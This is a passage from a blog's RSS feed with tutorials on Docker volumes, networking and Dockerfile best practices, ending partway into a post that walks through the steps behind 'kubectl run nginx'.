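    -v "$project_dir/dist":/app/dist \
    -w /app \
    "$image" "$@"
}
</code></pre>
<p>For example, <code>safe_build "$(pwd)" node:20-alpine npm run build</code> lets the build write to <code>dist</code>, while any attempt to modify the rest of the project fails with a read-only filesystem error.</p>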
<h3>The Default Bridge Has No DNS, And This Will Bite You</h3>
<p>I cannot stress this enough. The default bridge network does <strong>not</strong> provide DNS resolution. If you run two containers without <code>--network</code> and try to connect by name, the lookup fails with a name-resolution error such as "bad address" or "could not resolve host". I have seen teams waste hours chasing what looked like connectivity problems that were really just missing DNS because nobody created a custom network.</p>
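<p>A quick way to confirm this on your own machine is to ping a peer by name from a throwaway container, once on the default bridge and once on a custom network. This is a minimal sketch: <code>reachable_by_name</code> is a hypothetical helper, and it assumes a container with the given name is already running on the network you test.</p>
<pre><code class="language-bash"># Hypothetical check: can a fresh container reach PEER by name on NETWORK?
# Pass "bridge" for the default bridge, or the name of a custom network.
reachable_by_name() {
  network="$1"
  peer="$2"
  if docker run --rm --network "$network" alpine:3.20 ping -c 1 -W 2 "$peer"; then
    echo "$peer is reachable by name on $network"
  else
    echo "$peer is NOT reachable by name on $network"
    return 1
  fi
}
</code></pre>
<p>With a container named <code>web</code> running on the network under test, <code>reachable_by_name bridge web</code> should report a failure, while <code>reachable_by_name my-net web</code> should succeed.</p>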
<h3>Volume Data Outlives Everything</h3>
<p>Named volumes are not removed when you run <code>docker rm</code>, <code>docker system prune</code>, or even <code>docker system prune -a</code>. The only commands that remove them are <code>docker volume rm</code> and <code>docker volume prune -a</code> (on Docker 23.0 and later, a plain <code>docker volume prune</code> only removes anonymous volumes). This is by design, but it means orphaned volumes accumulate silently. Run <code>docker system df</code> monthly. You will be surprised.</p>
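<p>To see what has piled up, you can ask Docker for volumes that no container references. The two helper names below are hypothetical; the <code>dangling=true</code> filter is the part doing the work. This sketch only reports and never deletes anything.</p>
<pre><code class="language-bash"># List volumes that no container currently references.
orphaned_volumes() {
  docker volume ls --quiet --filter dangling=true
}

# Print a one-line count. Nothing is deleted here.
report_orphans() {
  count="$(orphaned_volumes | wc -l | tr -d ' ')"
  echo "$count orphaned volume(s)"
}
</code></pre>
<p>Review the output of <code>orphaned_volumes</code> before removing anything: a database volume whose container was removed also shows up as dangling, and that may be data you still want.</p>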
<h3>Port Mapping Bypasses Your Firewall</h3>
<p>On Linux, Docker's port mapping manipulates iptables directly. This means <code>-p 8080:80</code> can expose a service to the public internet <strong>even if your host firewall blocks port 8080</strong>. Docker inserts its rules before the firewall's. This is a well-known footgun and has led to real production incidents. Always bind to <code>127.0.0.1</code> explicitly if you only need local access.</p>
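<p>One way to make the safe choice the default is a small wrapper that always publishes on loopback. This is a sketch only; <code>run_local</code> is a hypothetical name, and everything after the two port arguments is passed to <code>docker run</code> unchanged.</p>
<pre><code class="language-bash"># Hypothetical wrapper: publish HOST_PORT on 127.0.0.1 only.
# Usage: run_local HOST_PORT CONTAINER_PORT [docker run args...] IMAGE
run_local() {
  host_port="$1"
  container_port="$2"
  shift 2
  docker run -d -p "127.0.0.1:${host_port}:${container_port}" "$@"
}
</code></pre>
<p>After <code>run_local 8080 80 --name web nginx:alpine</code>, running <code>docker port web</code> should list <code>127.0.0.1:8080</code> rather than <code>0.0.0.0:8080</code>.</p>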
<hr />
<h2>7. Quick Reference</h2>
<h3>Volume Commands</h3>
<pre><code class="language-bash">docker volume create my-data          # Create a named volume
docker volume ls                       # List all volumes
docker volume inspect my-data          # Show volume details
docker volume rm my-data               # Delete a volume
docker volume prune                    # Remove unused anonymous volumes
docker volume prune -a                 # Remove ALL unused volumes (careful!)
</code></pre>
<h3>Network Commands</h3>
<pre><code class="language-bash">docker network create my-net           # Create a custom bridge
docker network ls                      # List all networks
docker network inspect my-net          # Show network details and connected containers
docker network rm my-net               # Delete a network
docker network connect my-net my-ctr   # Attach a running container to a network
docker network disconnect my-net my-ctr # Detach a running container
</code></pre>
<h3>Running Containers With Storage and Networks</h3>
<pre><code class="language-bash"># Named volume
docker run -v my-data:/app/data myimage

# Bind mount (read-only)
docker run -v /host/path:/container/path:ro myimage

# tmpfs
docker run --tmpfs /app/temp myimage

# Custom network with port mapping
docker run -d --name web --network my-net -p 8080:80 nginx:alpine

# The full combo: volume + network + port
docker run -d --name db \
  --network my-net \
  -v db-data:/var/lib/postgresql/data \
  -p 5432:5432 \
  postgres:17-alpine
</code></pre>
<h3>Common Database Volume Paths</h3>
<table>
<thead>
<tr>
<th>Image</th>
<th>Mount Path</th>
</tr>
</thead>
<tbody><tr>
<td><code>postgres</code></td>
<td><code>/var/lib/postgresql/data</code></td>
</tr>
<tr>
<td><code>mysql</code></td>
<td><code>/var/lib/mysql</code></td>
</tr>
<tr>
<td><code>mongo</code></td>
<td><code>/data/db</code></td>
</tr>
<tr>
<td><code>redis</code></td>
<td><code>/data</code></td>
</tr>
</tbody></table>
<hr />
<h2>Key Takeaways</h2>
<ol>
<li><p><strong>Containers are isolated by design.</strong> Breaking that isolation is not a failure — it is the entire point of building real applications with Docker.</p>
</li>
<li><p><strong>Volumes break filesystem isolation.</strong> Named volumes (Docker-managed, portable) for production. Bind mounts (host-mapped, live reload) for development. tmpfs (memory-only) for secrets.</p>
</li>
<li><p><strong>Custom bridge networks break network isolation.</strong> The default bridge has no DNS. A custom bridge gives you free service discovery by container name. Always create one.</p>
</li>
<li><p><strong>Port mapping breaks host isolation.</strong> <code>-p 8080:80</code> lets your host reach the container. Bind to <code>127.0.0.1</code> in production unless you intend public exposure.</p>
</li>
<li><p><strong>Volumes outlive containers.</strong> We proved it: killed Redis, started a fresh container with the same volume, and <code>GET greeting</code> still returned <code>"Hello Day 4!"</code>.</p>
</li>
<li><p><strong>DNS-based discovery is the pattern.</strong> Connect by container name, not IP. IPs change. Names do not. This is how Kubernetes works, too - learn the pattern now.</p>
</li>
<li><p><strong>Bind mounts with</strong> <code>:rw</code> <strong>can modify your host filesystem.</strong> Default to <code>:ro</code>. Mount only what you need. Never give a container write access to your entire project directory unless you understand the risk.</p>
</li>
</ol>
<hr />
<h2>What's Next: Day 5</h2>
<p>You can now persist data, connect containers by name, and expose services to your host. But you typed a lot of <code>docker run</code> commands today, each with a growing list of flags. Imagine managing ten services this way.</p>
<p>In <strong>Day 5: Docker Compose - Defining Multi-Container Applications</strong>, you will learn to describe your entire application stack in a single YAML file and bring it all up with one command. The volume mounts, networks, and port mappings you learned today will become simple declarations in a Compose file.</p>
<p>See you tomorrow.</p>
<hr />
]]></content:encoded></item><item><title><![CDATA[Day 3: Stop Writing Dockerfiles From Scratch]]></title><description><![CDATA[7 Days of Docker (2026), by Saloni Narang, Docker Captain & CNCF Ambassador

I'm a Docker Captain. I've reviewed many Dockerfiles, and I can tell you that every single Dockerfile tutorial on the inter]]></description><link>https://blog.kubesimplify.com/day-3-stop-writing-dockerfiles-from-scratch</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-3-stop-writing-dockerfiles-from-scratch</guid><category><![CDATA[Docker]]></category><category><![CDATA[Dockerfile]]></category><category><![CDATA[docker images]]></category><category><![CDATA[docker captain]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Fri, 24 Apr 2026 17:10:21 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/9a9c22be-d40d-4d2e-a85a-9877ce728557.svg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker (2026)</strong>, by Saloni Narang, Docker Captain &amp; CNCF Ambassador</p>
</blockquote>
<p>I'm a Docker Captain. I've reviewed many Dockerfiles, and I can tell you that every single Dockerfile tutorial on the internet starts the same way: <code>FROM</code>, <code>RUN</code>, <code>COPY</code>, <code>CMD</code>. Memorize four keywords. Congratulations, you know nothing.</p>
<p>Knowing the instructions is like knowing how to spell. It doesn't make you a writer. Today I'm not going to teach you syntax. Today I'm going to teach you to <strong>think</strong> about Dockerfiles: why each line exists, what order they go in, and what happens to your build time and image size when you get it wrong.</p>
<p>If you followed <a href="https://blog.kubesimplify.com/day-2-your-images-are-a-supply-chain-and-it-s-probably-broken">Day 2</a>, you already understand that images are stacked layers. Now you're going to create those layers yourself, and you're going to do it right the first time.</p>
<hr />
<h2>Table of Contents</h2>
<ul>
<li><p><a href="#1-docker-init-the-2026-way">1. docker init: The 2026 Way</a></p>
</li>
<li><p><a href="#2-tearing-apart-a-dockerfile">2. Tearing Apart a Dockerfile</a></p>
</li>
<li><p><a href="#3-the-cache-trick-that-changes-everything">3. The Cache Trick That Changes Everything</a></p>
</li>
<li><p><a href="#4-multi-stage-builds-its-not-about-size">4. Multi-Stage Builds: It's Not About Size</a></p>
</li>
<li><p><a href="#5-docker-debug-your-new-best-friend">5. docker debug: Your New Best Friend</a></p>
</li>
<li><p><a href="#6-what-nobody-tells-you">6. What Nobody Tells You</a></p>
</li>
<li><p><a href="#7-quick-reference">7. Quick Reference</a></p>
</li>
<li><p><a href="#whats-next-day-4">What's Next: Day 4</a></p>
</li>
</ul>
<hr />
<h2>1. docker init: The 2026 Way</h2>
<p>Here's my first controversial opinion of the day: <strong>stop writing Dockerfiles from scratch.</strong></p>
<p><code>docker init</code> exists. It asks you five questions and generates a very good Dockerfile, <code>.dockerignore</code>, <code>compose.yaml</code>, and a <code>README.Docker.md</code>. Here's what it actually looks like when you run it on a Node.js project:</p>
<pre><code class="language-plaintext">$ docker init

Welcome to the Docker Init CLI!

This utility will walk you through creating the following files with sensible defaults for your project:
  - .dockerignore
  - Dockerfile
  - compose.yaml
  - README.Docker.md

Let's get started!

? What application platform does your project use? Node
? What version of Node do you want to use? 20.17.0
? Which package manager do you want to use? npm
? What command do you want to use to start the app? node server.js
? What port does your server listen on? 3000

✔ Created → .dockerignore
✔ Created → Dockerfile
✔ Created → compose.yaml
✔ Created → README.Docker.md

→ Your Docker files are ready!
  Review your Docker files and tailor them to your application.
  Consult README.Docker.md for information about using the generated files.

! Warning → The following files required to run your application were not found.
  Create them before running your application:
  - package.json
  - package-lock.json
</code></pre>
<p>Five questions. Four files. And a warning that keeps you honest: it noticed <code>package.json</code> and <code>package-lock.json</code> don't exist yet. That warning matters, as you'll see in a moment.</p>
<p><strong>So why am I writing a blog post about Dockerfiles if a tool generates them?</strong></p>
<p>Because you need to understand what it generates. You need to be the person who can look at a generated Dockerfile and say "this is correct" or "this needs to change for our use case." <code>docker init</code> is where you start. Understanding is where you become dangerous.</p>
<p>Let's dissect what it actually produced, line by line.</p>
<hr />
<h2>2. Tearing Apart a Dockerfile</h2>
<p>This is the Dockerfile <code>docker init</code> actually generated. Not simplified. Not cleaned up. The real thing.</p>
<pre><code class="language-dockerfile"># syntax=docker/dockerfile:1

ARG NODE_VERSION=20.17.0

FROM node:${NODE_VERSION}-alpine

ENV NODE_ENV production

WORKDIR /usr/src/app

RUN --mount=type=bind,source=package.json,target=package.json \
    --mount=type=bind,source=package-lock.json,target=package-lock.json \
    --mount=type=cache,target=/root/.npm \
    npm ci --omit=dev

USER node

COPY . .

EXPOSE 3000

CMD node server.js
</code></pre>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/7ab366ab-336d-4e98-9217-5df133d71402.png" alt="" style="display:block;margin:0 auto" />

<p>Every decision in here is intentional. Let's go line by line.</p>
<p><code># syntax=docker/dockerfile:1</code>: This is a parser directive, not a comment. It must be the very first line. It pins the Dockerfile to the latest stable 1.x BuildKit syntax, ensuring consistent behaviour across different Docker versions, CI systems, and remote builders. In Docker 23.0+ BuildKit is on by default so <code>--mount</code> works without it, but on older installs or CI environments it may not. Keep it for portability.</p>
<p><code>ARG NODE_VERSION=20.17.0</code>: A build-time variable with a default. This means you can override it without touching the Dockerfile: <code>docker build --build-arg NODE_VERSION=22.0.0 .</code>. Pin to a specific version in production; override in CI when testing upgrades.</p>
<p><code>FROM node:${NODE_VERSION}-alpine</code>: Uses the ARG from above. Alpine is significantly smaller than Debian-based images, often reducing image size by several hundred MB. This is not "use Node." It's "start with this entire filesystem and runtime." Every line after this is built on top of Alpine + Node 20.17.0.</p>
<p><code>ENV NODE_ENV production</code>: Sets an environment variable that persists into the running container. At runtime, this tells Node frameworks like Express and Next.js to enable production-mode optimizations. Note: recent npm versions also default to omitting devDependencies when <code>NODE_ENV=production</code> is set, but the <code>--omit=dev</code> flag in the RUN step makes that explicit instead of relying on the environment.</p>
<p><code>WORKDIR /usr/src/app</code>: Sets the working directory for every subsequent instruction. Note it's <code>/usr/src/app</code>, not <code>/app</code>. This is the conventional location for Node apps per the Node Docker Best Practices guide. Docker creates it if it doesn't exist.</p>
<p><code>RUN --mount=type=bind ... npm ci --omit=dev</code>: This is the line that makes this Dockerfile different from what you'd write by hand. Several things are happening at once:</p>
<ul>
<li><p><code>--mount=type=bind,source=package.json,target=package.json</code>: Binds your <code>package.json</code> into the container <em>only for this RUN step</em>. It is not persisted in the final image layer, but it still influences build cache. The file is available at build time, gone from the image afterward.</p>
</li>
<li><p><code>--mount=type=bind,source=package-lock.json,target=package-lock.json</code>: Same for the lockfile. This is why <code>docker init</code> warned us both files need to exist; it's reading them directly from your filesystem, not copying them.</p>
</li>
<li><p><code>--mount=type=cache,target=/root/.npm</code>: Mounts a persistent build cache at the npm cache directory. On the next build, npm reuses packages from this cache even if the image layer is rebuilt. Dramatically faster on repeated builds.</p>
</li>
<li><p><code>npm ci</code> instead of <code>npm install</code>: <code>ci</code> installs exactly what's in the lockfile, fails if there's a mismatch, and never modifies <code>package-lock.json</code>. Deterministic. Right for production builds.</p>
</li>
<li><p><code>--omit=dev</code> instead of <code>--production</code>: The modern flag name. Same effect: skips devDependencies.</p>
</li>
</ul>
<p><code>USER node</code>: Switches to the non-root <code>node</code> user for every later <code>RUN</code>, <code>CMD</code>, and <code>ENTRYPOINT</code>, so the app process runs unprivileged. One caveat: <code>USER</code> does not change who owns copied files. <code>COPY</code> writes files as root (UID 0) unless you add <code>--chown=node:node</code>, which here means the app can read its source but not modify it. If an attacker compromises your app process, they land as an unprivileged user. Root in a container is not the same as root on the host, but it's still a risk you don't need to take.</p>
<p><code>COPY . .</code>: Copies your entire application source into the image. Comes <em>after</em> <code>npm ci</code> so a source code change doesn't invalidate the dependency install step. Add <code>--chown=node:node</code> only if the app needs to write inside its own directory. The <code>.dockerignore</code> file (also generated by <code>docker init</code>) controls what gets excluded.</p>
<p><code>EXPOSE 3000</code>: Metadata only. It does not open or publish a port by itself. It documents which port the application listens on so that <code>docker run -P</code>, Compose, and orchestrators can wire it up automatically.</p>
<p><code>CMD node server.js</code>: The default command. This is shell form, so <code>/bin/sh -c</code> wraps the process: the shell becomes PID 1 and Node runs as its child. That is simpler for a starter template, but the shell does not forward signals such as <code>SIGTERM</code>, so <code>docker stop</code> may wait out its grace period and then kill the container. In production, prefer exec form (<code>CMD ["node", "server.js"]</code>) so the Node process runs as PID 1 and receives signals directly, which allows a clean shutdown.</p>
<p>Once you have your <code>package.json</code>, <code>package-lock.json</code>, and <code>server.js</code> in place, build and run with:</p>
<pre><code class="language-bash">docker build -t d3-app .
docker run -d --name d3 -p 3000:3000 d3-app
</code></pre>
<p>Then run <code>docker history d3-app</code> and pay attention to what is <em>not</em> there. <code>package.json</code> and <code>package-lock.json</code> will not appear as layers at all. They were bind-mounted during the RUN step, available to <code>npm ci</code>, but never copied into the image. The npm cache mount is the same story: it lives outside the image entirely. The only real weight your image carries is the <code>npm ci</code> layer and whatever your <code>COPY . .</code> step brings in.</p>
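<p>To check whether the stop signal actually reaches your app, you can time <code>docker stop</code>. By default it sends <code>SIGTERM</code> and waits 10 seconds before sending <code>SIGKILL</code>, so a result close to 10 suggests the signal never reached a handler. This is a minimal sketch: <code>stop_seconds</code> is a hypothetical helper, and a fast stop also assumes your <code>server.js</code> handles <code>SIGTERM</code> itself.</p>
<pre><code class="language-bash"># Hypothetical helper: print how many whole seconds "docker stop" took.
stop_seconds() {
  start="$(date +%s)"
  # Capture the output so only the elapsed time is printed.
  stopped="$(docker stop "$1")"
  end="$(date +%s)"
  echo "$((end - start))"
}
</code></pre>
<p>Run <code>stop_seconds d3</code> against the shell-form image, then rebuild with exec form and compare the two numbers.</p>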
<hr />
<h2>3. The Cache Trick That Changes Everything</h2>
<p>This is where most tutorials fail you. They show the correct Dockerfile but never explain <em>why</em> the order matters. Let me fix that.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/0a25e08f-6f85-4056-955a-6b3445e5896b.png" alt="" style="display:block;margin:0 auto" />

<p>Docker's build cache works on one brutal rule: <strong>the moment a layer changes, every layer after it is rebuilt from scratch.</strong> Cache invalidation cascades downward. Always.</p>
<p>Here's what a bad Dockerfile looks like:</p>
<pre><code class="language-dockerfile">FROM node:20-alpine
WORKDIR /app
# copies EVERYTHING
COPY . .
# runs every time ANY file changes
RUN npm install --production
CMD ["node", "server.js"]
</code></pre>
<p>You change one line in <code>server.js</code>. Docker sees that <code>COPY . .</code> has different input files. Cache busted. Which means <code>npm install</code> also reruns, even though your dependencies haven't changed. You wait 15 seconds for a zero-dependency-change build. Multiply that by 50 developers and 20 builds a day and you've burned hours.</p>
<p>Now the good version:</p>
<pre><code class="language-dockerfile">FROM node:20-alpine
WORKDIR /app
# dependencies change rarely
COPY package.json .
# cached unless package.json changed
RUN npm install --production
# app code changes often, goes LAST
COPY server.js .
CMD ["node", "server.js"]
</code></pre>
<p>You change <code>server.js</code>. Docker checks: did <code>package.json</code> change? No. Cached. Did <code>npm install</code> inputs change? No. Cached. Only <code>COPY server.js .</code> reruns. Build time: sub-second.</p>
<p><strong>This is not a micro-optimization. This is a 10x difference in build time.</strong> I have seen real CI pipelines go from 4-minute builds to 25-second builds by fixing instruction order alone. No new hardware. No fancy caching service. Just understanding how layers work.</p>
<p>The rule is simple: <strong>things that change rarely go at the top. Things that change often go at the bottom.</strong> Dependency manifests before source code. System packages before application packages. Always.</p>
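<p>If you want a quick sanity check for this rule on a Node project, a few lines of <code>awk</code> can flag the most common mistake. This is a deliberately naive sketch, not a real linter: <code>check_copy_order</code> is a hypothetical name, it only looks at the first <code>COPY . .</code> and the first line mentioning <code>npm ci</code> or <code>npm install</code>, and it does not understand multi-stage files.</p>
<pre><code class="language-bash"># Hypothetical lint: fail if "COPY . ." appears before the npm install step.
# Usage: check_copy_order PATH_TO_DOCKERFILE
check_copy_order() {
  awk '
    /npm (ci|install)/ { exit 0 }
    /^COPY +\. +\.( |$)/ {
      print "line " NR ": COPY . . runs before the npm install step"
      exit 1
    }
  ' "$1"
}
</code></pre>
<p>Running <code>check_copy_order Dockerfile</code> prints nothing and returns 0 when the dependency install comes first, which makes it easy to drop into a pre-commit hook or CI step.</p>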
<hr />
<h2>4. Multi-Stage Builds: It's Not About Size</h2>
<p>Everyone explains multi-stage builds as "make your image smaller." That's true but it's the wrong framing. Multi-stage builds are about <strong>separation of concerns.</strong></p>
<p>Your build environment needs compilers, package managers, build tools, debug symbols. Your production environment needs <em>none of that.</em> Every tool in your production image is a tool an attacker can use. Every extra binary is attack surface. Multi-stage builds let you use a full workshop to build, then ship only the finished product.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/707d016e-aab7-42b5-9cde-78a1eee04b8b.png" alt="" style="display:block;margin:0 auto" />

<p>Here's a Go application using a multi-stage build:</p>
<pre><code class="language-dockerfile">FROM golang:1.22-alpine AS builder
WORKDIR /app
COPY go.mod go.sum ./
RUN go mod download
COPY . .
RUN CGO_ENABLED=0 GOOS=linux go build -o server

FROM alpine:3.20
RUN adduser -D appuser
COPY --from=builder /app/server /server
USER appuser
CMD ["/server"]
</code></pre>
<p><strong>Stage 1 (</strong><code>builder</code><strong>):</strong> Uses <code>golang:1.22-alpine</code>, which includes the full Go compiler, linker, and standard library. <code>go.mod</code> and <code>go.sum</code> are copied first so <code>go mod download</code> can be cached independently of source changes (the same caching logic as Node's dependency layer). <code>CGO_ENABLED=0</code> produces a fully static binary with no dynamic library dependencies, so the binary runs on any Linux-based image. If your project has no external modules, drop the <code>go.sum</code> copy and <code>go mod download</code> line, but you still need <code>go.mod</code> (Go 1.16+ builds in module mode by default and fails without one).</p>
<p><strong>Stage 2 (production):</strong> Starts fresh from <code>alpine:3.20</code>. Creates a non-root user. Copies <em>only the compiled binary</em> from stage 1. The Go compiler, source code, intermediate objects, all left behind. They never make it into the final image.</p>
<p>You can verify the size difference with <code>docker images</code> after building both. In practice, a static Go binary on top of Alpine typically weighs in around 10 to 20 MB, while a Node image carrying the full runtime and <code>node_modules</code> is usually well over 100 MB. The exact numbers depend on your dependencies, but the order-of-magnitude gap is consistent.</p>
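<p>For a direct comparison, you can read the size straight from the image metadata instead of eyeballing the <code>docker images</code> table. A minimal sketch, assuming both images are already built locally; <code>image_mb</code> is a hypothetical helper name.</p>
<pre><code class="language-bash"># Hypothetical helper: print an image's size in whole megabytes.
image_mb() {
  # .Size is reported in bytes.
  bytes="$(docker image inspect --format '{{.Size}}' "$1")"
  echo "$((bytes / 1000000))"
}
</code></pre>
<p>Call it once per image, for example <code>image_mb d3-app</code> and then again with whatever tag you gave the Go build, and compare the two numbers.</p>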
<p>The more important win is attack surface. A Node image carries npm, a shell, a package manager, and dozens of utilities. If someone exploits a vulnerability in your app and gets code execution, they have tools to work with. A Go image on Alpine is far more restricted: running as a non-root user means no ability to install packages even though <code>apk</code> is present, and far fewer pre-installed utilities to abuse. For maximum restriction, use a distroless or scratch base in stage 2 and your production image won't even have a shell.</p>
<p><strong>Smaller images aren't just faster to pull. They have less attack surface.</strong></p>
<p>For compiled languages (Go, Rust, C, C++), multi-stage builds are non-negotiable. For interpreted languages (Node, Python, Ruby), you can't eliminate the runtime, but you can still use multi-stage to install build-time-only dependencies in a separate stage and copy only production artifacts forward.</p>
<hr />
<h2>5. docker debug: Your New Best Friend</h2>
<blockquote>
<p><strong>Note:</strong> <code>docker debug</code> is a Docker Desktop feature and requires a paid Docker subscription (Pro, Team, or Business). It is not included in open-source Docker Engine / Docker CE. Minimum Docker Desktop version is 4.33. Check with <code>docker debug --help</code> before relying on it.</p>
</blockquote>
<p>Here's a scenario: your multi-stage build produces a final image based on a distroless base or even <code>scratch</code> (a completely empty image). Something's wrong at runtime. You want to shell in and look around. But there's no shell in the image. <code>docker exec -it mycontainer sh</code> fails.</p>
<p>Enter <code>docker debug</code>:</p>
<pre><code class="language-bash">docker debug d3-go
</code></pre>
<p><code>docker debug</code> attaches a debug shell to <em>any</em> container or image, even distroless, even scratch-based, even stopped containers. It injects a temporary toolbox with a shell, common utilities, and diagnostic tools without modifying the target image.</p>
<p>This is a game-changer for production debugging. You built a minimal, secure image. Now you can still inspect it when things go sideways without compromising your security posture by shipping a shell in production.</p>
<p>You can also use it to inspect any image directly:</p>
<pre><code class="language-bash">docker debug myapp:latest
</code></pre>
<p>This drops you into the filesystem of that image. You can poke around, check what files exist, verify environment variables, and understand the exact state of what you shipped. No more adding <code>RUN ls -la</code> to your Dockerfile and rebuilding 14 times.</p>
<hr />
<h2>6. What Nobody Tells You</h2>
<blockquote>
<p><strong>Every</strong> <code>RUN</code><strong>,</strong> <code>COPY</code><strong>, and</strong> <code>ADD</code> <strong>instruction creates a filesystem snapshot.</strong> That's not a metaphor. Docker literally takes a diff of the filesystem before and after each instruction and stores it as a compressed tar layer. Metadata instructions (<code>ENV</code>, <code>EXPOSE</code>, <code>CMD</code>, <code>USER</code>, <code>LABEL</code>) don't touch the filesystem; they just attach metadata to the image and appear as zero-byte entries in <code>docker history</code>.</p>
<p>This means the <em>order</em> of your instructions isn't just a style preference. It's an architecture decision. Reorder your instructions and build time changes by 10x. Put your <code>COPY . .</code> in the wrong place and you invalidate your entire cache on every single commit. Put a <code>RUN rm -rf /tmp/build</code> after a <code>RUN make install</code> and the deleted files still exist in the previous layer (they're just marked as deleted in the new one, and the image doesn't shrink).</p>
<p>Once you internalize that a Dockerfile is a sequence of filesystem snapshots, not a shell script, everything about Docker image optimization clicks into place. Layer ordering, cache invalidation, multi-stage builds, <code>.dockerignore</code>: they're all consequences of this one mental model.</p>
</blockquote>
<hr />
<h2>7. Quick Reference</h2>
<h3>Core Dockerfile Instructions</h3>
<table>
<thead>
<tr>
<th>Instruction</th>
<th>What It Actually Does</th>
</tr>
</thead>
<tbody><tr>
<td><code>FROM</code></td>
<td>Chooses the starting filesystem</td>
</tr>
<tr>
<td><code>WORKDIR</code></td>
<td>Sets (and creates) the working directory</td>
</tr>
<tr>
<td><code>COPY</code></td>
<td>Adds files; order determines cache strategy</td>
</tr>
<tr>
<td><code>RUN</code></td>
<td>Executes a command, snapshots the result</td>
</tr>
<tr>
<td><code>EXPOSE</code></td>
<td>Metadata only, documents the port</td>
</tr>
<tr>
<td><code>USER</code></td>
<td>Sets the user for later <code>RUN</code>, <code>CMD</code>, and <code>ENTRYPOINT</code>; <code>COPY</code> still needs <code>--chown</code> to change file ownership</td>
</tr>
<tr>
<td><code>CMD</code></td>
<td>Default process; shell form is simpler, exec form <code>["..."]</code> gives direct signal handling</td>
</tr>
<tr>
<td><code>ENTRYPOINT</code></td>
<td>Fixed executable; CMD becomes its arguments</td>
</tr>
<tr>
<td><code>ENV</code></td>
<td>Sets env vars that persist to runtime</td>
</tr>
<tr>
<td><code>HEALTHCHECK</code></td>
<td>Tells Docker how to verify the app is alive</td>
</tr>
</tbody></table>
<h3>Build Commands You'll Actually Use</h3>
<pre><code class="language-bash">docker build -t myapp .                     # standard build
docker build --no-cache -t myapp .          # force full rebuild
docker build -f Dockerfile.prod -t myapp .  # use a specific Dockerfile
docker init                                 # generate a production Dockerfile
docker history myapp                        # inspect layer sizes
docker debug mycontainer                    # shell into anything (Docker Desktop, paid sub)
</code></pre>
<h3>The Cache Rule</h3>
<pre><code class="language-plaintext">Things that change RARELY   -&gt;  top of Dockerfile    -&gt;  cached forever
Things that change SOMETIMES -&gt;  middle               -&gt;  cached usually
Things that change OFTEN     -&gt;  bottom               -&gt;  rebuilt quickly
</code></pre>
<hr />
<h2>What's Next: Day 4</h2>
<p>You can now build production images that are small, secure, and fast to rebuild. But containers are ephemeral. When they stop, their writable layer vanishes. Your database, your uploads, your logs: gone.</p>
<p>On <strong>Day 4: Docker Volumes &amp; Persistent Storage</strong>, we tackle the hard problem: making data survive container death. Volumes, bind mounts, named volumes, and the patterns that keep your data safe when everything else is disposable.</p>
<p>See you tomorrow.</p>
]]></content:encoded></item><item><title><![CDATA[What Actually Happens When You Run kubectl run nginx]]></title><description><![CDATA[So you type kubectl run nginx --image nginx. One line, one pod. About a second later on a warm cluster, the pod is Running. But what actually happens behind the scenes? Let us walk through it, step by]]></description><link>https://blog.kubesimplify.com/kubectl-run-nginx-inside</link><guid isPermaLink="true">https://blog.kubesimplify.com/kubectl-run-nginx-inside</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Devops]]></category><category><![CDATA[containers]]></category><category><![CDATA[#Pods ]]></category><category><![CDATA[kubectl]]></category><category><![CDATA[cloud native]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Fri, 24 Apr 2026 11:30:41 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/aa7ec61b-b806-4e12-87e5-58c51b8a94d7.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>So you type <code>kubectl run nginx --image nginx</code>. One line, one pod. About a second later on a warm cluster, the pod is Running. But what actually happens behind the scenes? Let us walk through it, step by step.</p>
<p><a class="embed-card" href="https://www.youtube.com/watch?v=LLuUhU3SwJo&amp;t=4s">https://www.youtube.com/watch?v=LLuUhU3SwJo&amp;t=4s</a></p>

<h2>TL;DR, the 23 steps</h2>
<ol>
<li><p><code>kubectl</code> parses argv and builds a minimal Pod object.</p>
</li>
<li><p>It reads <code>~/.kube/config</code> for cluster, user, and context.</p>
</li>
<li><p>A TCP connection is opened to the API server. TLS 1.3 negotiates keys in one round trip with mutual cert auth.</p>
</li>
<li><p><code>kubectl</code> sends <code>POST /api/v1/namespaces/default/pods</code> with a JSON body over HTTP/2.</p>
</li>
<li><p>The API server authenticates the caller (x509, bearer token, OIDC, or webhook).</p>
</li>
<li><p>It authorizes the request against RBAC. Can this user create pods in default?</p>
</li>
<li><p>Mutating admission runs. <code>ServiceAccount</code> injects a projected token volume, <code>LimitRanger</code> fills in default requests and limits, and so on.</p>
</li>
<li><p>The API server defaults missing fields (DNS policy, restart policy, termination grace period) and then validates against the OpenAPI schema.</p>
</li>
<li><p>Validating admission runs. <code>ResourceQuota</code>, <code>PodSecurity</code>, any <code>ValidatingAdmissionWebhook</code>, and the built in <code>ValidatingAdmissionPolicy</code> CEL engine (GA since 1.30).</p>
</li>
<li><p>The API server writes to etcd via Raft. Leader replicates, followers fsync, a majority acks, and only then does the pod exist.</p>
</li>
<li><p>The API server returns <code>201 Created</code>. <code>kubectl</code> prints <code>pod/nginx created</code>.</p>
</li>
<li><p>Watch fanout. Every component holding an open watch stream (scheduler, kubelets, controllers) is notified within milliseconds.</p>
</li>
<li><p>The scheduler runs Filter plugins. <code>NodeResourcesFit</code>, <code>NodeAffinity</code>, <code>TaintToleration</code>, <code>PodTopologySpread</code>, <code>VolumeBinding</code>.</p>
</li>
<li><p>It runs Score plugins. <code>NodeResourcesBalancedAllocation</code>, <code>ImageLocality</code>, <code>InterPodAffinity</code>, <code>NodeAffinity</code>.</p>
</li>
<li><p>The winning node gets picked. Scheduler POSTs to <code>/pods/nginx/binding</code>, which updates <code>spec.nodeName</code>. One more etcd write.</p>
</li>
<li><p>The kubelet on that node sees the bound pod through its watch. <code>syncPod</code> fires.</p>
</li>
